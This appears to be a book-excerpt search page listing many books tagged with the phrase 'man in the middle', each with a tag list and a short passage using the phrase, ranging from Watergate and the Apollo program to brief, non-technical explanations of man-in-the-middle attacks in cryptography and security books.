You knew right then the video wasn’t going to end well. But in the video, the young man seemed remarkably calm; as if he hadn’t imagined what was coming. Five men stood behind him, each wearing a mask and black clothing. The pale-skinned young man introduced himself. “My name is Nicholas Berg, from West Chester, Pennsylvania.” The masked man in the middle began reading from a script. He had a hoarse, guttural voice, not the voice of a gentle man. “Where is the sense of honor, where is the rage?” the masked man asked. “Where is the anger for God’s religion?” Then, with a little flip of his hand, the man with the hoarse voice handed his script to a man on his left.
Hard Times: The Divisive Toll of the Economic Slump by Tom Clark, Anthony Heath
Affordable Care Act / Obamacare, Alan Greenspan, British Empire, business cycle, Carmen Reinhart, classic study, credit crunch, Daniel Kahneman / Amos Tversky, debt deflation, deindustrialization, Etonian, eurozone crisis, falling living standards, full employment, Gini coefficient, Greenspan put, growth hacking, hedonic treadmill, hiring and firing, income inequality, interest rate swap, invisible hand, It's morning again in America, John Maynard Keynes: Economic Possibilities for our Grandchildren, Kenneth Rogoff, labour market flexibility, low interest rates, low skilled workers, MITM: man-in-the-middle, mortgage debt, new economy, Northern Rock, obamacare, oil shock, plutocrats, price stability, quantitative easing, Right to Buy, Ronald Reagan, science of happiness, statistical model, The Wealth of Nations by Adam Smith, unconventional monetary instruments, War on Poverty, We are the 99%, women in the workforce, working poor
The big difference concerns wages, which have subsequently climbed by only 0.6% annually at the median.17 That implies that the typical employee has now been missing out on something like three-quarters of the extra prosperity that America has been generating over 40 years. The graph below captures this great divergence for male workers, for whom it has been most acute. While overall American output has roughly doubled since the 1970s, mostly because of rising productivity, the figure shows that the pay of the man in the middle, the median male worker, has barely budged. The woman in the middle has not fared quite so badly, but her modest progress has certainly not made up for the difficulties of the men: typical working-age household incomes in 2010 were stuck at the levels of the late 1980s.18 This grim picture is not the product of interpretations or definitions: tinker with the composition of remuneration – by adding in pensions or healthcare, for instance – and it does not brighten.20 The old story of a rising tide lifting all boats has simply ceased to apply.
High Steel: The Daring Men Who Built the World's Greatest Skyline by Jim Rasenberger
AOL-Time Warner, Bear Stearns, collective bargaining, Donald Trump, East Village, Ford Model T, illegal immigration, Lewis Mumford, MITM: man-in-the-middle, scientific management, strikebreaker, Tacoma Narrows Bridge, union organizing, urban planning, vertical integration, young professional
It is often taken, incorrectly, for a Lewis Hine photo; in fact, it was shot by a publicity photographer named Hamilton Wright, Jr. As for the identity of the ironworkers, many Mohawks are convinced that the fourth from the left is Joe Jocks of Kahnawake, while Newfoundlanders insist that the shirtless man in the middle is Ray Costello of Conception Harbour. Captions on other photographs taken that same day identify the three men on the far left as John O’Rielly [sic], George Covan, and Joseph Eckner. The shirtless man whom Newfoundlanders believe to be Ray Costello is identified elsewhere as Howard Kilgore (though people who knew Costello swear it’s he) and the next three are identified as William Birger, Joe Curtis, and John Portla.
King Richard: Nixon and Watergate--An American Tragedy by Michael Dobbs
anti-communist, Berlin Wall, coronavirus, COVID-19, cuban missile crisis, desegregation, Donald Trump, MITM: man-in-the-middle, RAND corporation, rolodex, Ronald Reagan, Seymour Hersh, Ted Sorensen, éminence grise
The stunning developments in Judge Sirica’s courtroom had brought the Watergate scandal to the doorstep of the White House. In the opinion of the Washington Post columnist Joseph Kraft, what had previously been “a sideshow” had turned into “a political bomb that could blow the Nixon administration apart.” The “finger of guilt” was no longer pointing solely at senior Nixon aides like Mitchell and Haldeman. “The man in the middle” was now the president himself. According to James Reston of The New York Times, even Nixon supporters were now asking how “an Administration that has been so cautious, shrewd, and successful in dealing with world affairs could also be so reckless, awkward and even stupid in dealing with human affairs.”
How Not to Grow Up: A Coming of Age Memoir. Sort Of. by Richard Herring
British Empire, MITM: man-in-the-middle, Russell Brand, Stephen Hawking
Part of me felt I was sliding further into the slippery pit of depravity, from which I might never escape, even though it provided me with some temporary comfort. And Chloe had a softness and a sweetness to her and genuinely seemed to like me and care about me, without being desirous of any kind of serious relationship. But I also liked the fact she was clearly naughty and adventurous and sexy. I was nothing if not a man in the middle of a midlife crisis. And conversely, we were both adults and both single and so where was the harm? Unless she turned out to be a psycho stalker, intent on selling her story of celebrity sleaze to a tabloid. If so she’d miscalculated wildly by choosing a celebrity who no one had ever heard of and who was more than likely to be the one brazenly writing about the experience himself.
The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats by Richard A. Clarke, Robert K. Knake
"World Economic Forum" Davos, A Declaration of the Independence of Cyberspace, Affordable Care Act / Obamacare, air gap, Airbnb, Albert Einstein, Amazon Web Services, autonomous vehicles, barriers to entry, bitcoin, Black Lives Matter, Black Swan, blockchain, Boeing 737 MAX, borderless world, Boston Dynamics, business cycle, business intelligence, call centre, Cass Sunstein, cloud computing, cognitive bias, commoditize, computer vision, corporate governance, cryptocurrency, data acquisition, data science, deep learning, DevOps, disinformation, don't be evil, Donald Trump, Dr. Strangelove, driverless car, Edward Snowden, Exxon Valdez, false flag, geopolitical risk, global village, immigration reform, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, John Perry Barlow, Julian Assange, Kubernetes, machine readable, Marc Benioff, Mark Zuckerberg, Metcalfe’s law, MITM: man-in-the-middle, Morris worm, move fast and break things, Network effects, open borders, platform as a service, Ponzi scheme, quantum cryptography, ransomware, Richard Thaler, Salesforce, Sand Hill Road, Schrödinger's Cat, self-driving car, shareholder value, Silicon Valley, Silicon Valley startup, Skype, smart cities, Snapchat, software as a service, Steven Levy, Stuxnet, technoutopianism, The future is already here, Tim Cook: Apple, undersea cable, unit 8200, WikiLeaks, Y2K, zero day
Against his initial instincts, he green-lit an audacious idea from his incident response team, who argued that instead of trying to get the adversary out of the network quickly, they needed to keep the adversary inside their network, to try to understand their intent and interests. They proposed firewalling off the intruder to limit what information he could access, and then doing their own man-in-the-middle attack to compromise his command and control and learn his tactics and techniques. “I’ve been on the job for three months, and I’m like, ‘Holy shit, you’ve got to be kidding me.’” But Gagnon saw the value in the intelligence he could collect. “So, I said I will do this once, but I will never do it again.”
The Nature of Software Development: Keep It Simple, Make It Valuable, Build It Piece by Piece by Ron Jeffries
Amazon Web Services, anti-pattern, bitcoin, business cycle, business intelligence, business logic, business process, c2.com, call centre, cloud computing, continuous integration, Conway's law, creative destruction, dark matter, data science, database schema, deep learning, DevOps, disinformation, duck typing, en.wikipedia.org, fail fast, fault tolerance, Firefox, Hacker News, industrial robot, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, Kanban, Kubernetes, load shedding, loose coupling, machine readable, Mars Rover, microservices, Minecraft, minimum viable product, MITM: man-in-the-middle, Morris worm, move fast and break things, OSI model, peer-to-peer lending, platform as a service, power law, ransomware, revision control, Ruby on Rails, Schrödinger's Cat, Silicon Valley, six sigma, software is eating the world, source of truth, SQL injection, systems thinking, text mining, time value of money, transaction costs, Turing machine, two-pizza team, web application, zero day
The default would be to download libraries from the Internet. (The standard joke for Maven users is that Maven downloads half of the Internet to run a build.) Downloading dependencies from the Internet is convenient but not safe. It’s far too easy for one of those dependencies to silently be replaced, either through a man-in-the-middle attack or by compromising the upstream repository. Even if you download dependencies from the Net to start with, you should plan on moving to a private repository as soon as possible. Only put libraries into the repository when their digital signatures match published information from the upstream provider.
Why geography matters: three challenges facing America : climate change, the rise of China, and global terrorism by Harm J. De Blij
agricultural Revolution, airport security, Anton Chekhov, Ayatollah Khomeini, Berlin Wall, British Empire, colonial exploitation, complexity theory, computer age, crony capitalism, demographic transition, Deng Xiaoping, Eratosthenes, European colonialism, F. W. de Klerk, failed state, Fall of the Berlin Wall, Francis Fukuyama: the end of history, global village, Great Leap Forward, high-speed rail, illegal immigration, Internet Archive, John Snow's cholera map, Khyber Pass, manufacturing employment, megacity, megaproject, Mercator projection, MITM: man-in-the-middle, Nelson Mandela, Oklahoma City bombing, out of africa, RAND corporation, risk tolerance, Ronald Reagan, social distancing, South China Sea, special economic zone, Thomas Malthus, trade route, transatlantic slave trade, UNCLOS
problems, France's quarrel with the United States over Iraq, prospects for the euro and EU enlargement, and the issue of a European Constitution, then very much in the news while it was being prepared, a momentous event in the EU's history. I went on too long and left no time for a Q&A session, but asked anyone with comments to come up to the lectern afterward. Soon a group of about a dozen listeners converged on me, and I could see that some of them were quite angry. "You were unfair to Germany's government!" shouted a man in the middle of the pack. Before I could answer, someone started a bitter complaint about my view of the French. "No," said the vociferous German, "he was quite right about you French. You want to run the European Union, but the British won't let you do it." In a few moments the Europeans among the group were in a shouting match with each other, no longer interested in arguing with me.
Moon Shot: The Inside Story of America's Apollo Moon Landings by Jay Barbree, Howard Benedict, Alan Shepard, Deke Slayton, Neil Armstrong
Apollo 11, Apollo 13, Charles Lindbergh, clockwatching, Gene Kranz, gravity well, invisible hand, Kickstarter, low earth orbit, MITM: man-in-the-middle, Neil Armstrong, operation paperclip, orbital mechanics / astrodynamics, place-making
Alan, as chief of the Astronaut Office, was responsible for day-to-day operations. Astronauts were needed for spacecraft tests, for design reviews, for newspaper interviews. With equanimity, he distributed these seemingly limitless tasks to a very limited number of “his boys.” He was an impenetrable barrier to inappropriate or untimely requests. He was “the man in the middle” and handled it well. Moon Shot is their story. Much more than the story of their flights in space, it details their central role in the most exciting adventure in history. Jay Barbree, one of the world’s most experienced space journalists, reported the triumphs and the tragedies from the dawn of the space age.
How to Build a Billion Dollar App: Discover the Secrets of the Most Successful Entrepreneurs of Our Time by George Berkowski
Airbnb, Amazon Web Services, Andy Rubin, barriers to entry, Black Swan, business intelligence, call centre, crowdsourcing, deal flow, Dennis Tito, disruptive innovation, Dunbar number, en.wikipedia.org, game design, Google Glasses, Google Hangouts, Google X / Alphabet X, growth hacking, iterative process, Jeff Bezos, Jony Ive, Kickstarter, knowledge worker, Lean Startup, loose coupling, Marc Andreessen, Mark Zuckerberg, Mary Meeker, minimum viable product, MITM: man-in-the-middle, move fast and break things, Network effects, Oculus Rift, Paul Graham, QR code, Ruby on Rails, Salesforce, self-driving car, Sheryl Sandberg, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, SoftBank, software as a service, software is eating the world, Steve Jobs, Steven Levy, subscription business, TechCrunch disrupt, Travis Kalanick, two-pizza team, ubercab, Y Combinator
That’s definitely not the easiest thing to do – and you’ll find that you’ll need to employ numerous simultaneous strategies to make it work. So what are the important things to get right in order to delight people? Design is one. If you’ve used the Hailo app you’ll have noticed there is a little blue man in the middle of the app who denotes your current location. In the very first version of Hailo, this little blue guy (whose nickname is Barty – named after a summer intern) was just a blue pin. The pin was clear, simple and well recognised. One of our designers – a rather emo-looking fellow, who plays in a band, loves tattoos and used to make video games at Electronic – didn’t think it was good enough.
Sunfall by Jim Al-Khalili
airport security, artificial general intelligence, augmented reality, Bletchley Park, Carrington event, cosmological constant, cryptocurrency, dark matter, David Attenborough, Fellow of the Royal Society, Higgs boson, imposter syndrome, Intergovernmental Panel on Climate Change (IPCC), Internet of things, invisible hand, Kickstarter, lockdown, mass immigration, megacity, MITM: man-in-the-middle, off grid, pattern recognition, quantum cryptography, quantum entanglement, Silicon Valley, smart cities, sorting algorithm, South China Sea, stem cell, Stephen Hawking, Turing test
Wasn’t that the subject of last week’s lecture – something about the Ekert 91 protocol?’ Shireen grinned, suddenly feeling even more pleased with herself. ‘I know, foolproof, right? And you know as well as I do that every cyb in the world is looking for new attack strategies that target vulnerabilities in the system. And if you ask any of them they’ll tell you that the obvious man-in-the-middle attacks and the photon number splitting attacks don’t work. In fact, government and corporation sites don’t even bother following up on these cyber alerts any more. And that’s the beauty of it; they’re so cocksure their encryptions can’t be broken that no one is watching me.’ ‘And that’s what you think you’ve done, is it?
House of God by Samuel Shem
affirmative action, index card, lateral thinking, medical residency, MITM: man-in-the-middle, Norman Mailer, placebo effect
'Too calm,' I whispered to Quick as we watched the barkeep slowly mop the floor and deny any shooting in his establishment. Then Quick supplied the clue." "The slop the barman mopped was red. Beer is not red, and yet red blood is," said Quick. "I then spotted three men sitting too close together against the wall, and commanded them to move. They did, and the man in the middle fell over, dead. Such was their surprise that we refrained from having to 'stick them' with our lead nightsticks, thus avoiding many months of work with Cohen around the gnawing question of guilt. A dangerous time." "The raw red time when words give way to acts," said Quick. "We must all take care," said the redhead.
Rainbows End by Vernor Vinge
disinformation, Drosophila, failed state, Future Shock, MITM: man-in-the-middle, pneumatic tube, technological singularity, Vernor Vinge
If this is the scam, you will be the heroes of the day, my hands in disabling those little boxes you and your friends planted — but your fame will likely be posthumous. My condolences! (2) To sabotage some component of the labs, maybe in a way that won’t become evident till much later disasters. This is almost as stupid as (1). (3) To install (or cover) some fiendishly clever Man-in-the-Middle software that gives Alfred de facto ownership of research done in that part of lab that you, Robert, infested for him. This would be cool, and it is my personal favorite (see my discussion of fruit flies in Chapter 3). Unfortunately for Alfred, this caper is so far blown that I doubt it will survive the audits that will surely come raining down.
The One Device: The Secret History of the iPhone by Brian Merchant
Airbnb, animal electricity, Apollo Guidance Computer, Apple II, Apple's 1984 Super Bowl advert, Black Lives Matter, Charles Babbage, citizen journalism, Citizen Lab, Claude Shannon: information theory, computer vision, Computing Machinery and Intelligence, conceptual framework, cotton gin, deep learning, DeepMind, Douglas Engelbart, Dynabook, Edward Snowden, Elon Musk, Ford paid five dollars a day, Frank Gehry, gigafactory, global supply chain, Google Earth, Google Hangouts, Higgs boson, Huaqiangbei: the electronics market of Shenzhen, China, information security, Internet of things, Jacquard loom, John Gruber, John Markoff, Jony Ive, Large Hadron Collider, Lyft, M-Pesa, MITM: man-in-the-middle, more computing power than Apollo, Mother of all demos, natural language processing, new economy, New Journalism, Norbert Wiener, offshore financial centre, oil shock, pattern recognition, peak oil, pirate software, profit motive, QWERTY keyboard, reality distortion field, ride hailing / ride sharing, rolodex, Shenzhen special economic zone , Silicon Valley, Silicon Valley startup, skeuomorphism, skunkworks, Skype, Snapchat, special economic zone, speech recognition, stealth mode startup, Stephen Hawking, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, TED Talk, Tim Cook: Apple, Tony Fadell, TSMC, Turing test, uber lyft, Upton Sinclair, Vannevar Bush, zero day
“Once you’re connected to the network, they could start trying to throw attacks at your phone… But for the most part, the Pineapple is more for sniffing traffic.” If I logged on to Gmail, for instance, the hackers could force me to go somewhere else, a site of their choosing. Then they could launch a man-in-the-middle attack. “If you went to Facebook and went to your bank account, they’d be able to see that information too,” he says. “So, yeah, you just want to be careful not to connect to any Wi-Fi.” Okay, but how common is this, really? “Pineapples?” Ronnie says. “I can go buy one for a hundred, a hundred twenty bucks.
Arabian Sands by Wilfred Thesiger
back-to-the-land, clean water, Etonian, Fellow of the Royal Society, MITM: man-in-the-middle, the market place
I could have gone to Bahrain by aeroplane from Sharja but I preferred to go there by dhow. The journey should have taken four days but lasted eleven. The naukhada, or skipper, was an old man, nearly blind, who spent most of his time asleep on the poop. The mate, an energetic Negro, described what he saw and the naukhada told him where to go. Once he woke the old man in the middle of the night to consult him. The naukhada gave his orders, but when the mate said ‘Nonsense, Uncle!’, he went grumbling back to sleep. The first night it blew a gale. The seas broke over the ship and I was very sick. We had to shelter under the Persian coast, and there we remained for three days, since the wind, when it moderated, was against us.
The Coke Machine: The Dirty Truth Behind the World's Favorite Soft Drink by Michael Blanding
"World Economic Forum" Davos, An Inconvenient Truth, carbon footprint, classic study, clean water, collective bargaining, corporate social responsibility, Exxon Valdez, Gordon Gekko, Internet Archive, laissez-faire capitalism, market design, military-industrial complex, MITM: man-in-the-middle, Naomi Klein, Nelson Mandela, New Journalism, Pepsi Challenge, Ponzi scheme, profit motive, Ralph Nader, rolodex, Ronald Reagan, shareholder value, stock buybacks, The Theory of the Leisure Class by Thorstein Veblen, The Wealth of Nations by Adam Smith, Thorstein Veblen, union organizing, Upton Sinclair, Wayback Machine
“But it would destroy me as a person if anything happened to her.” After the initial spate of violence, the threats against the union subsided somewhat, but not before Galvis himself was subject to attack. He was driving home with his bodyguards in August 2003, when he turned the corner to find a man in the middle of the street pointing a pistol at the car. One of his bodyguards opened the door to shoot, and the man started firing. After a few exchanges of gunfire, the assailant drove off on his motorbike, and Galvis reported the incident to the police as an attempt on his life. He heard nothing until 2007 when the attorney general’s office informed him there was an investigation against him for making a false claim.
Jennifer Morgue by Stross, Charles
Boeing 747, call centre, Carl Icahn, correlation does not imply causation, disinformation, disintermediation, dumpster diving, Dutch auction, Etonian, haute couture, interchangeable parts, Maui Hawaii, messenger bag, MITM: man-in-the-middle, mutually assured destruction, operational security, PalmPilot, planetary scale, RFID, Seymour Hersh, Silicon Valley, Skype, slashdot, stem cell, telepresence, traveling salesman, Turing machine
SLIDE 3: Grainy black-and-white photographs, evidently taken from TV screens: a long cylindrical structure grasped in the claws of an enormous grab. From below, thin streamers rise up towards it. "BLUE HADES took exception to the intrusion into their territory and chose to exercise their salvage rights under Article Five, Clause Four of the Benthic Treaty. Hence the tentacles. Now ..." SLIDE 1 (Repeat): This time the man in the middle is circled with a red highlighter. "This fellow in the middle is Ellis Billington, as he looked thirty years ago. Ellis was brilliant but not well socialized back then. He was attached to the 'B' team as an observer, tasked with examining the circuitry of the cipher machine they hoped to recover from the sub's control room.
Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age by Steven Levy
Albert Einstein, Bletchley Park, Claude Shannon: information theory, cognitive dissonance, Compatible Time-Sharing System, computer age, disinformation, Donald Knuth, Eratosthenes, Extropian, Fairchild Semiconductor, information security, invention of the telegraph, Jim Simons, John Gilmore, John Markoff, John Perry Barlow, Kevin Kelly, knapsack problem, Marc Andreessen, Mitch Kapor, MITM: man-in-the-middle, Mondo 2000, Network effects, new economy, NP-complete, quantum cryptography, Ronald Reagan, Saturday Night Live, Silicon Valley, Simon Singh, Stephen Hawking, Steven Levy, Watson beat the top human players on Jeopardy!, web of trust, Whole Earth Catalog, zero-sum game, Zimmermann PGP, éminence grise
She scrambles it with Bob’s public key, and only Bob can unscramble it. But what if Alice has never met Bob—how does she get his public key? If she asks him for it directly, she can’t encode her request (obviously not, because she doesn’t have his public key yet, which she would use to encrypt the message). So a potential eavesdropper, Eve, could act as “a man in the middle,” and snatch that message en route. Then Eve, pretending to be Bob, could send her own public key to Alice, falsely representing it as Bob’s key. (This deceptive masquerade is known as “spoofing.”) If Alice is duped, she’ll encode her secret message to Bob with the key. Alas, Bob won’t be able to read anything scrambled with that key—only tricky Eve can.
Eloquent JavaScript: A Modern Introduction to Programming by Marijn Haverbeke
always be closing, Charles Babbage, domain-specific language, Donald Knuth, en.wikipedia.org, Firefox, fizzbuzz, functional programming, higher-order functions, hypertext link, job satisfaction, MITM: man-in-the-middle, premature optimization, slashdot, web application, WebSocket
14 properties, 72 representation, 15 searching, 73 String function, 28, 105 stroke method, 290–292 strokeRect method, 289, 421 strokeStyle property, 290 strokeText method, 295 stroking, 289, 290, 295, 306 strong (HTML tag), 235, 237 structure, 168, 222, 227, 334 Structure and Interpretation of Computer Programs, 202 structure sharing, 79 style, 237 style (HTML tag), 238, 239 style attribute, 237–239, 273 style sheet, see CSS subclass, 111 submit, 318, 320, 321 submit event, 321, 384, 425 substitution, 54 subtraction, 13, 113 sum function, 5, 78 summing (exercise), 78, 409 summing example, 4, 83, 89, 211 superclass, 111 survey, 294 Sussman, Gerald, 202 SVG, 287–289, 305, 306 swapping bindings, 424 swipe, 342 switch keyword, 34 symbiotic relationship, 183 symbol, 106 Symbol function, 106 Symbol.iterator symbol, 107 SymmetricMatrix class, 111 synchronization, 387, 426 synchronous programming, 182, 195, 359, 368 syncState method, 335, 338, 340, 341, 349, 426 syntax of Egg, 203, 204 error, 26, 129, 130 expression, 23 function, 42, 45 identifier, 26 number, 12, 165 object, 63 operator, 13 statement, 24, 26, 28–34, 135 string, 14 syntax tree, 204–205, 207, 228–229 SyntaxError type, 206 T tab character, 14, 32 TAB key, 320 tabbed interface (exercise), 262, 419 tabindex attribute, 252, 320, 349 table (HTML tag), 243, 266, 274, 422 table example, 417 tableFor function, 68 tables, 67, 68, 274 tags, 221–222, 227, 239, see also names of specific tags talk, 371, 372, 377–379 talkResponse method, 380 talksAbout function, 231 talkURL function, 383 Tamil, 87 tampering, 317 tangent, 75 target property, 250 task management example, 71 TCP, 220, 221, 311, 373 td (HTML tag), 243, 274 Tef, 166 temperature example, 110 template, 171, 388, 426 template literals, 15 tentacle (analogy), 25, 63, 65 terminal, 354 termite, 183 ternary operator, 18, 20, 209 test method, 146 test runners, 132 test suites, 132 testing, 125, 132 text, 14, 221, 222, 227, 229, 295, 305–307, 322, 324, 358, 422 text 
field, 257, 318, 319, 322 text method, 315 text node, 229, 231, 233, 419 text wrapping, 305 text-align (CSS), 243 textAlign property, 295, 420 textarea (HTML tag), 260, 318, 322, 327, 330, 425 textBaseline property, 295, 420 textContent property, 418, 422 TEXT_NODE code, 229, 419 textScripts function, 94, 411 th (HTML tag), 243 then method, 186–188, 191, 416 theory, 133 this binding, 62, 98–99, 101, 130 thread, 182, 183, 198, 259 throw keyword, 135, 136, 139, 141, 413 tile, 303 time, 147, 148, 150, 184, 241, 261, 277, 278, 280, 283, 303, 346 time zone, 150 timeline, 182, 197, 223, 241, 247, 258 timeout, 188, 259, 373, 374, 380 Timeout class, 189 times method, 269 timing, 396 title, 382 title (HTML tag), 222, 223 toDataURL method, 344 toLowerCase method, 62, 243 tool, 145, 164, 175, 334, 339, 340, 342–344, 347, 350, 357 tool property, 335 ToolSelect class, 340 top (CSS), 240–242, 244 top-level scope, see global scope toString method, 99, 100, 103–105, 346, 362 touch, 255, 334 touchend event, 255 touches method, 278 touches property, 255, 339 touchmove event, 255, 339, 350 touchstart event, 255, 337, 339 toUpperCase method, 62, 132, 243, 362 tr (HTML tag), 243, 274 trackKeys function, 282, 285 transform (CSS), 287 transformation, 297–299, 308, 420 translate method, 298, 299 Transmission Control Protocol, 220, 221, 311, 373 transparency, 289, 296, 346 transpilation, 213 trapezoid, 307, 420 traversal, 152 tree, 100, 204, 229 treeGraph function, 394 trial and error, 133, 282, 293 triangle (exercise), 37, 407 trigonometry, 75, 241 trim method, 73, 268 true, 16 trust, 224 try keyword, 136, 137, 190, 413, 422 type, 12, 16, 112 type attribute, 318, 321 type checking, 131, 174 type coercion, 18, 19, 28 type observation, 392, 401, 403 type property, 204, 249 type variable, 131 typeof operator, 16, 80, 410 TypeScript, 131–132 typing, 260 typo, 129 U Ullman, Ellen, xx unary operator, 16, 23 uncaught exception, 138, 188 undefined, 18, 19, 25, 42, 47, 61, 63, 77, 129, 130, 134 
underline, 237 underscore character, 26, 35, 98, 151, 157 undo history, 346, 347 UndoButton class, 347 Unicode, 15, 17, 87, 92, 147, 162, 163 unicycling, 371 Uniform Resource Locator, see URL uniformity, 204 uniqueness, 239 unit (CSS), 242, 257 Unix, 366–368 Unix time, 150 unlink function, 359, 366 unshift method, 71 unwinding the stack, 135 upcasing server example, 362 updated method, 378, 381, 425 updateState function, 336 upgrading, 169 upload, 325 URL, 221, 224, 288, 313, 315, 317, 360, 373, 383 URL encoding, 314 url package, 364, 380 urlToPath function, 364 usability, 251 use strict, 130 user experience, 247, 320, 372, 383 user interface, 138, 334 users’ group, 371 UTF-8, 358, 359 UTF-16, 15, 92 V V8, 398 validation, 134, 140, 203, 277, 321, 378, 379 value, 12, 186 value attribute, 318, 322, 324 var keyword, 25, 43, 76 variables, see also binding Vec class, 113, 268, 269, 280, 394, 396, 421 vector, 394, 400 vector (exercise), 113, 411 vector graphics, 295 verbosity, 46, 182 version, 169, 222, 312, 357, 398 viewport, 275–277, 301, 302, 305 VillageState class, 119 virtual keyboard, 252 virtual world, 117, 119, 121 virus, 224 vocabulary, 41, 84 void operator, 26 volatile data storage, 12 W waitForChanges method, 380 waiting, 184 walking, 303 warning, 357 wave, 271, 280, 281 web, see World Wide Web web application, 5, 326, 333 web browser, see browser web page, 174 web worker, 259 WebDAV, 369 webgl (canvas context), 289 website, 224, 225, 313, 353, 369, 371 WebSockets, 373 weekDay module, 169–170 weekend project, 369 weresquirrel example, 60, 62, 64, 66, 69, 71 while loop, 4, 30, 32, 53, 160 whitespace in HTML, 231, 340, 419 indentation, 32 matching, 147, 162 syntax, 204, 206, 214, 417 trimming, 73, 268 in URLs, 373–374 Why’s (Poignant) Guide to Ruby, 22 width property, 350, 423 window, 250, 255, 258 window object, 248 with statement, 131 word boundary, 151 word character, 147, 151, 162 work list, 124, 343 workbench (exercise), 330, 422 world, of a game, 265 World 
Wide Web, 5, 77, 219, 221, 224, 225, 311 writable stream, 360–363, 364 write method, 360, 361 writeFile function, 359, 361, 425 writeHead method, 360 writing code, 6, 117 writing system, 87 WWW, see World Wide Web X XML, 230, 288 XML namespace, 288 xmlns attribute, 288 Y yield (reserved word), 26 yield keyword, 197 your own loop (example), 95 Yuan-Ma, 10, 352 Z Zawinski, Jamie, 144 zero-based counting, 56, 61, 150 zeroPad function, 54 zigzag shape, 420 zooming, 305 Eloquent JavaScript, 3rd Edition is set in New Baskerville, Futura, Dogma, and TheSansMono Condensed.
The Next Shift: The Fall of Industry and the Rise of Health Care in Rust Belt America by Gabriel Winant
affirmative action, Affordable Care Act / Obamacare, anti-communist, antiwork, blue-collar work, business cycle, Capital in the Twenty-First Century by Thomas Piketty, classic study, clean water, collective bargaining, company town, coronavirus, COVID-19, creative destruction, deindustrialization, desegregation, deskilling, emotional labour, employer provided health coverage, Erik Brynjolfsson, Ford paid five dollars a day, full employment, future of work, ghettoisation, independent contractor, invisible hand, Kitchen Debate, labor-force participation, longitudinal study, low skilled workers, mandatory minimum, manufacturing employment, mass incarceration, MITM: man-in-the-middle, moral hazard, new economy, New Urbanism, obamacare, opioid epidemic / opioid crisis, pink-collar, post-industrial society, post-work, postindustrial economy, price stability, RAND corporation, Ronald Reagan, Second Machine Age, secular stagnation, the built environment, union organizing, upwardly mobile, urban renewal, vertical integration, War on Poverty, white flight, Wolfgang Streeck, women in the workforce, work culture, working poor
Benjamin Chinitz, “Contrasts in Agglomeration: New York and Pittsburgh,” American Economic Review 51, no. 2 (May 1961), 285; Dillard, An American Childhood, 75, 92, 134; “Supervisors Connected with Civic Activities,” April 16, 1957, box 30, folder 8, USSCDWIRDR; Salaj, “Blue Collar Memories”; Wickerham, interview. Deborah Rudacille, Roots of Steel: Boom and Bust in an American Mill Town (New York: Pantheon, 2010), 18. See Nelson Lichtenstein, “The Man in the Middle: A Social History of Automobile Industry Foremen,” in On the Line: Essays in the History of Auto Work, ed. Nelson Lichtenstein and Stephen Meyer (Urbana: University of Illinois Press, 1989). 30. “Rules and Regulations Governing the Operations of the Duquesne Luncheon Club,” ca. 1957, box 27, USSCDWIRDR. 31.
Reaganland: America's Right Turn 1976-1980 by Rick Perlstein
8-hour work day, Aaron Swartz, affirmative action, air traffic controllers' union, airline deregulation, Alan Greenspan, Alistair Cooke, Alvin Toffler, American Legislative Exchange Council, anti-communist, Apollo 13, Ayatollah Khomeini, Berlin Wall, Bernie Sanders, Boeing 747, Brewster Kahle, business climate, clean water, collective bargaining, colonial rule, COVID-19, creative destruction, crowdsourcing, cuban missile crisis, currency peg, death of newspapers, defense in depth, Deng Xiaoping, desegregation, disinformation, Donald Trump, Dr. Strangelove, energy security, equal pay for equal work, facts on the ground, feminist movement, financial deregulation, full employment, global village, Golden Gate Park, guns versus butter model, illegal immigration, In Cold Blood by Truman Capote, index card, indoor plumbing, Internet Archive, invisible hand, Julian Assange, Kitchen Debate, kremlinology, land reform, low interest rates, Marshall McLuhan, mass immigration, military-industrial complex, MITM: man-in-the-middle, Monroe Doctrine, moral panic, multilevel marketing, mutually assured destruction, New Journalism, oil shock, open borders, Peoples Temple, Phillips curve, Potemkin village, price stability, Ralph Nader, RAND corporation, rent control, road to serfdom, Robert Bork, Robert Solow, rolodex, Ronald Reagan, Rosa Parks, Saturday Night Live, Silicon Valley, Suez crisis 1956, three-martini lunch, traveling salesman, unemployed young men, union organizing, unpaid internship, Unsafe at Any Speed, Upton Sinclair, upwardly mobile, urban decay, urban planning, urban renewal, wages for housework, walking around money, War on Poverty, white flight, WikiLeaks, Winter of Discontent, yellow journalism, Yom Kippur War, zero-sum game
Michael Parrish, “How Dorie Miller’s Bravery Helped Fight Navy Racism,” World War II Magazine, October 31, 2019. “like overripe fruit” Richard Reeves, President Reagan: The Triumph of Imagination (New York: Simon & Schuster, 2005), 154; Robert Welch, The Blue Book of the John Birch Society (Belmont, MA: Western Islands, 1961) 11. “You remember Nancy” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 155. prospects of Jack Kemp ENIR, July 24, 1978. “Maybe it wouldn’t” Los Angeles Times Service, December 7, 1976. dinner at Stanford George Schultz, Turmoil and Triumph: My Years as Secretary of State (New York: Scribner, 1993).
…
The Pittsburgh Press’s article “Here’s Partial List of Open Stations,” “How Carter’s Carnegie Visit Was Kept a Secret,” “Violence Threatened If Fuel Redistributed,” “Carter, Residents Hold Mini-Summit,” all on page A-4, Pittsburgh Press, July 13, 1979. “They were pleased” Carter, White House Diary, 343. “almost frightening” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 136. Then came a final meeting Gordon Stewart, “Carter’s Speech Therapy,” NYT, July 14, 1979; Schlesinger, White House Ghosts, 302. Camp David movie theater Schlesinger, White House Ghosts, 303–4; Hendrik Hertzberg, “A Very Merry Malaise,” NewYorker.com, July 17, 2009.
…
